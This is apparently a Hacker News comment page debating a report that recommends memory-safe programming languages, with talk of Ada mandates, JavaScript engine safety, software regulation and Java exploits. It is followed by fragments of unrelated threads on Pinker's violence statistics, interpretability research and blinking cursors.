https://nap.nationalacademies.org/read/5463/chapter/3

tldr; seems to be that the software development world has changed from the days that DoD was the "dominant" software developer, and Ada in the interim did not get adopted by the commercial sector (with safety critical exceptions in aerospace, etc. noted).


what do we do about javascript?


Judging from HN, just use HTML instead.


HTML, the Programming language, right? https://news.ycombinator.com/item?id=38519719


Watch out Brainfuck, a challenger has arisen!


based and true.


Write javascript engines in memory safe languages. I'd vote for rust as rust and javascript's APIs are pretty similar in style, structure, consistency and security/other issues that are not memory safety.

On that note, try valgrind on existing javascript engines, you might be "entertained". (I certainly was, but that was some years back.


How are Rust and JS APIs similar, and why would it matter?

AFAIK the only competitive JS engines written in memory safe languages are GraalJS and other JS-on-the-JVM runtimes. GraalJS has the advantage of being fully up to date, not having any memory unsafe code in it (the JIT compiler that makes it fast is a separate module, also written in a memory safe language, and the JS impl does not have low level code in it). And you can run it on SubstrateVM which is a virtual machine also written in a memory safe language, although of course small parts like the GC need to use unsafe features.

It also has other useful features like sandboxing and the ability to interop with other languages like Python or Java. Plus, it can actually sandbox native code as well because the "languages" that you can run on GraalVM include both wasm and more usefully LLVM bitcode, in which each individual C/C++ allocation becomes GC-managed and bounds checked.

So in terms of memory safety the Graal team are way ahead there.

(disclosure: I recently started part time work with the GraalVM team, but was a long term supporter before that)


Rust and JS - er in short, there's a lot more to security than "memory safety". But then I've been in groups burned by NPM hacks in the past. I've tried Rust some but it looks like the same problems yet again. I'm wary, and going to give it time to mature - it's not interesting enough on its own - especially for someone more used to embedded programming spaces (C centric spaces, for good reasons).

As for the second - good to know! Seriously appreciate knowing that - not sure if/when I'll need it myself, but it's good to hear, and good that it's visible here!


Most javascript engines are JIT-based and that's hard to make safe, you'd need a complete proof that the emitted assembly is correct. It's similar to the problem of proving correctness for any compiler.


Oh, I've used such tests on other JIT based languages, as well as non-JIT. None made valgrind show quite so much show. I'm not sure I've ever seen less "memory safe" code bases.


Kind of interesting that they didn't include it given python is there. (JS is not even mentioned in the document.) I guess they don't class it as a general purpose programming language? It's not as if we have other options in the browser, particularly, and while node can do a lot of stuff, it's got a clearly intended purpose. Or... maybe they consider it unsafe somehow, but that seems less likely.


This ain't that kind of movie.


Will we one day be able to use AI to make code memory safe?


Reviewing C/C++ code for memory safety is probably a good use case for LLMs actually. Writing memory safe code from scratch is a much bigger ask.


I bet many, many false alarms


Perhaps, but reviewing code for memory safety issues is a more well defined task than general code generation so LLMs can be more easily trained to get better at it.


[flagged]


Next thing they'll be giving requirements for people building bridges, houses, and gas and electricity fittings.

Seriously, I think the time has long since passed software needs regulating. It's a major part of modern society, and as far as I'm aware, most people aren't opposed to building standards in principle.


If software had been regulated like engineering we'd still be writing horrible OO-heavy enterprise Java style code like in the 90s and UML would be mandatory.


We'd probably be using Ada. The government used to mandate that contractors write software in Ada, but they stopped because of the pushback they got; now they also use C++.


They'll "regulate" a bunch of controls to make corporations more efficient at making money, while limiting their liability when they get hacked and increasing the barrier to compete with them.

If we want a safer internet, make them carry insurance against data breaches and fine them a fixed amount, say $1500, for each identity they leak, paid immediately upon proof of pwnage.


The wild west had a lot less danger and death than Hollywood makes it out to seem. Likewise, I'm going to miss the internet and computing as we know it now when it's regulated to shit like everything else. Nothing nice ever lasts.

Complete safety, or actual freedom. Pick one. You can't have both.


>Complete safety, or actual freedom. Pick one. You can't have both.

False dichotomies aren't helpful and underscore lazy thinking. The real world is full of nuance, and so should our policies. Using a risk-based approach is probably more appropriate than an all-or-nothing policy.


> Pick one

Or, maybe pick a point on a spectrum.

That seems more realistic, because I'd argue you can't really have "Complete Safety" or "Actual Freedom" (by which I am guessing some people would interpret 'actual' as 'complete').


Please don't insult the 2014 government safety film 'A Million Ways to Die in the West'.


People figured out how to build buildings prior to creating building codes


And many buildings were built deliberately poorly to make a quick buck - or caught fire too easily or fell down in minor earthquakes (or worse damage other property/people). Peoples homes are a major financial commitment and can ruin people if they're not up to scratch.

The regulations are to ensure the 10% of bad builders/developers don't ruin peoples lives.


And yet, poorly build buildings are still being build, but at least now it is much harder and much more expensive for a person to build their own house, and for a small construction companies to compete with giant monopolies. Yay!


Well, it's not black and white.

Regulation hinders progress and makes things more expensive. But no regulation raises costs and hinders progress too: it basically creates a situation of very low trust, and low trust is extremely expensive for customers/buyers who are not domain experts. This also makes them overcautious and conservative. One needs a balance and lots of nuance to make a reasonably well functioning market/system.

The case against regulation on software business is not that "regulation is bad". It's that programming and software is very new and rapidly evolving area of human activity. It's not nearly as well understood as building houses. Written and unwritten standards and best practices are constantly changing. The field is subject to very strong fashion-driven "crazes".

(Just look at how many new languages are still being created. Most don't become as widespread as C++ or Java or Python, but many do find their niche, and very many are in use to some extent. This indicates that "language Holy Graal" is nowhere to be seen yet.)

In software, there is very little consensus between domain experts on most issues. This is very unlike construction and house building, where some new materials ant techniques are introduced too, but the basic principles are well understood, calculable, and where agreement among experts is usually quite achievable.

So arguably it's nearly impossible to create good regulation at this stage, at least outside of certain special niches. This is very different from building codes and stuff.

Of course there is also bad regulation. The bureaucracy likes to expand their control indefinitely, wants to regulate things that should not be regulated, thus (if unchecked) creating very bad regulation. Well, that's the case for checks and balances, for the society to fight back. But "this regulation is bad and needs to be changed" is a much more mature position than "we need no f*g regulation!", in my opinion...


"Poorly build [sic] buildings" depends on context. Even low-quality builds in the US are relatively safe. It's disingenuous to imply they are of the same quality as in countries where building codes are effectively non-existent.


https://en.wikipedia.org/wiki/Great_Fire_of_London

Building a building without regulation is easy. Building a city that doesn't burn to the ground every time someone knocks over an oil lamp is not.


And people figured out how to fly prior to the FAA. So what?



People also died, a lot.


Define "figured out." Did people know how to cobble together a structure? Of course. Did they inherently know all the best practices that reasonably balance safety, cost, and timeliness? Probably not.

The same can be applied to software. An ability to cobble together a "Hello World" does not necessarily mean I want you programming a controls system on a nuclear power plant.


It is ridiculous to equate a recommendation and a mandate.


Well, there are groups that want a government mandate for this, though.

If you don't know, Consumer Reports is paid by groups interested in encouraging the government to apply regulations to certain areas. A bike helmet manufacturer may pay them to create a report, host events, and otherwise lobby on their behalf to e.g. create regulations about people needing to use bike helmets.

It is my understanding that many Rust advocates, security researchers, and members of the Internet Society are effectively advocating/lobbying for partial government mandates of 'memory-safe languages'[0]:

> It’s not yet possible for government procurement to only buy memory-safe software. For example, you can’t say routers must be memory-safe top to bottom because no such products currently exist. But it may be possible for the government to say that newly developed custom components have to be memory-safe to slowly shift the industry forward.

> This would require some type of central coordination and trust in that system. The government could ask for a memory safety road map as part of procurement. The map would explain how the companies plan to eliminate memory-unsafe code in their products over time. The carrot approach for memory safety may include not just decreased future costs in cybersecurity, but also reliability and efficiency.

[0] https://advocacy.consumerreports.org/wp-content/uploads/2023...


Rust programmers want the government dollarinos? Amazing. It did feel a bit coordinated.


"${LANGUAGE} programmers" aren't really a thing. Our important skills translate fairly cleanly between ecosystems.


Ok fine, then to quote the parent to whom I was responding, “Rust advocates.”

I am willing to bet that most of those “Rust advocates” are programmers who code in Rust but I’m fine with not calling them that. I agree that good programmers should be able to work in different languages, operating systems, countries.


My point is that even in a world where the government mandates that certain applications that would otherwise be written in C++ are instead written in Rust or Swift we wouldn't see some massive loss of work for people who currently program in C++.


We may see that the 'next generation' of 'better' programming languages (the next Swift, the next Rust, etc.) cannot easily/readily/practically become certified for government use, though, leading to less innovation long term.

For example, if this had already happened we may find today that Java is certified for use but that Rust is simply not allowed, while maybe Swift is because of Apple's backing of it.


Ok, that’s a fair point. Imagine you’re Bjarne Stroustrup, sure he doesn’t consider himself a c++ programmer, and he isn’t worried about his employment prospects, but he still has a vested interest in this issue.


It is, but it doesn't mean folks won't.


I don't understand the point you're trying to make. You're the person who wrote it would be mandated, and now you're admitting it's a ridiculous position to take.

If you have some point to make please do so earnestly. Layering in levels of irony makes any point you're trying to make difficult to understand or follow, even if labelled with /s.

This is going off-topic, but there is a style of internet arguing that I have come to seriously dislike. It is one where instead of someone making a point, they make the point they wish to detract and simply flag that they are being ironic. In doing so they don't actually advance the point they're trying to make, they assume that the audience already understands and is sympathetic to that point, so they simply put up a target to scoff at.

I'm not sure if that's what you're doing here, or if you're just struggling to make a point about worrying about government intrusion into private business.


I guess the GP is trying to say that those languages will enter the compliance checklist of some unavoidable rule, and that recommendation will turn into an effective mandate.

What is a quite real possibility. For example, there are plenty of places out there that can't stop expiring passwords every 1 or 3 months because it's in one of those lists. But I do agree that complaining about the recommendation because of this is completely out of topic, the focus should be on the rule that actually mandates it.


Oh boy... Nothing is mandated here. These are just suggestions from experts. Don't take them if you don't want to.


wait for gov contract projects mandate them in the fine prints, it's a signal that is serious enough for anyone interested in doing any software-related business with gov, for them, this is nearly the same as 'mandated'


I for one would prefer that government projects set this kind of requirement. I don't want my government software implemented in C++. If they are the customer they should require that the projects do everything they can to eliminate bugs caused by memory unsafety. Using a Memory Safe language is one of the easiest ways to do so.


There actually was a mandate for government work in the past with Ada. This is not a mandate.

Even that mandate did not appear to fundamentally change the landscape beyond government work.


That’s just a customer with requirements.. like all customers.


But, on the other hand it’s not. The government is a virtual monopsony. One customer has unappealing requirements and you can choose not to serve them. The federal government saying don’t hire c devs will hurt c devs. C devs will be understandably dismayed by this.


But this differs from the above statement that specifically referred to "government-related business". The "business" part implies a contract but it doesn't mean all non-govt contracts need to follow suit.


Likely only if you're building government code.

Worked out well enough with Ada in 1978. https://en.m.wikipedia.org/wiki/Ada_(programming_language)#H...


I agree that it is not a mandate yet. NSA does have some interesting insight and expertise they acquire in this area.

Time and time again, we see experts make recommendations, then legislation and rules make it mandatory.

A burning example is most of NIST special publications. NIST makes no rules, mandates and such. Yet, mandates (e.g.,DFARS, DEAR) point to the recommendation as the requirement.

Right now there are two of these playing out in the cybersecurity field - zero trust and passwordless authentication.

So those who down this comment, you are right, it is not a mandate. Those who up this comment, you are right, it is likely to become a mandate.


Easier to decompile.


Some software needs to be NSA-certified. If you need a government certification, you get government mandates.

Though at this point, this is a recommendation, not a mandate.


Conspiracy: The NSA has compromised the runtimes of those languages to run arbitrary payloads and spy on everything that runs through them. I mean, "catch terrorists".


In unrelated news, security researchers have discovered a new class of vulnerabilities common to all memory safe languages

;)


>Java

Java it's a pest fest for exploits.

From those, I'd choose Go, C# (and not totally sure because of AOT/JIT's) and Rust.


>Java it's a pest fest for exploits.

Sure, if you haven't used it since the nineties and pay zero attention to new development.


I’ve only used Java in the last ten years. I helped deal with the log4j incident at a few companies. We specifically had to patch systems that were running newer versions of Java and older versions of Spring. The exploit relied on a new method of adding code to the JVM at runtime that newer versions of Spring had locked down to prevent people from using.

I’ve never seen an explanation for why this mechanism was added or what it was supposed to enable — besides enabling new exploits.

Every time I’ve seen Java used for a safety critical application the justification has been entirely based on the fact that it has cryptographic libraries that are widely certified for safety by enterprises. The security people on our side were… resigned.


The fact that everyone in these comments points at the one major incident in years is more telling than anything else.


Right, there haven't been crazy Java exploits going around the past few months, only Rust and Go!


Log4j affair was last year. Kinda funny how HN still bitch about node dependencies and how Java's are more mature.



Thanks. There's a follow up at https://blog.paulhankin.net/fibonacci2/


For a narrower but deeper treatment of violence (and war) alone, Pinker's https://en.wikipedia.org/wiki/The_Better_Angels_of_Our_Natur... is well worth a read.


While it's appealing to believe Pinker, his treatment of statistics and probability of war has been debunked. For a mathematical analysis of the history of war see Cirillo and Taleb's paper "On the statistical properties and tail risk of violent conflict" (https://www.fooledbyrandomness.com/violence.pdf).

From the paper: "Accordingly, the public intellectual arena has witnessed active debates, such as the one between Steven Pinker on one side, and John Gray on the other concerning the hypothesis that the long peace was a statistically established phenomenon or a mere statistical sampling error that is characteristic of heavy-tailed processes, 16] and [27]–the latter of which is corroborated by this paper."


Unsure, but maybe related to newer considerations/nuance:

Scaling theory of armed-conflict avalanches https://www.santafe.edu/news-center/news/avalanche-violence-...

Podcast: https://complexity.simplecast.com/episodes/39-9ugXDtkC


Skeptically.

Pinker has been called out for cherry picking by numerous other authors, and particularly Graeber/Wengrow who are a duo of academic anthropologist and archaeologist respectively. Another is Christopher Ryan. In both cases well reasoned counterarguments are poised against Pinker's reasoning.


The only thing I know about the book is from this article https://acoup.blog/2021/10/15/fireside-friday-october-15-202... which recommends Azar Gat, War in Human Civilization instead.


Anthropic at https://x.com/anthropicai/status/1709986949711200722

> The fact that most individual neurons are uninterpretable presents a serious roadblock to a mechanistic understanding of language models. We demonstrate a method for decomposing groups of neurons into interpretable features with the potential to move past that roadblock.


The author does refer to Elixir further down:

> UPD: Erlang/Elixir seem to be doing the right thing, too.


Updated a day after it was mentioned here :-)

https://github.com/tonsky/tonsky.me/commit/5fbbb373025be3758...


I don't think I'm alone in considering blinking keyboard cursor/carets as the original sin of this.

Here's an long-running collection of how to disable flashing cursors everywhere, from vi to Vscode: https://jurta.org/en/prog/noblink

> Software development is not an easy task, and often after a painful process of writing a program developers feel they should share their pains with users, so they put a part of own sufferings onto the shoulders of users in a method similar to the Chinese water torture - blinking cursors.


Cursors are fine to me, and frankly important. Flashing is "LOOK HERE IT'S IMPORTANT YOU KNOW WHAT'S HAPPENING HERE" and what happens when I press almost any button is a solid reason for grabbing my attention. I shouldn't have to search in a big pile of thin lines to see the specifically slightly differently shaped thin line to know what's going to happen when I type - let my visual system use the optimised "MOVING" alarms to let me know.

Making me hunt or test where my cursor is by making a change is far worse to me.

Interesting to know that some people find it hard. Does the default behaviour I see while typing (no blinking unless you pause) help?


What I would love to be standard in all product launches like this would be to have a mailing list per integration or, as with this, programming language.

I want to be able to drop my email address and only hear back when support for $MY_FAVE_LANG is available.


It's a bit buried, but if you go to https://app.infield.ai/hn and click "I don't use Ruby" we'll ask for your email/language and put you on our list.



I believe the main article ends at the "Share" button, then there's a separate ad or section about the educational models.


Haven't seen that format before. Substack ordinarily scatters various buttons/images/signups etc through an article so I'm accustomed to skipping over them to get to the next paragraph.

The subtitle of the article specifically mentions Educational Models, creating an expectation they will be covered as part of the subject matter. But then it's tacked on without any context or reason. Total non-sequitur.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: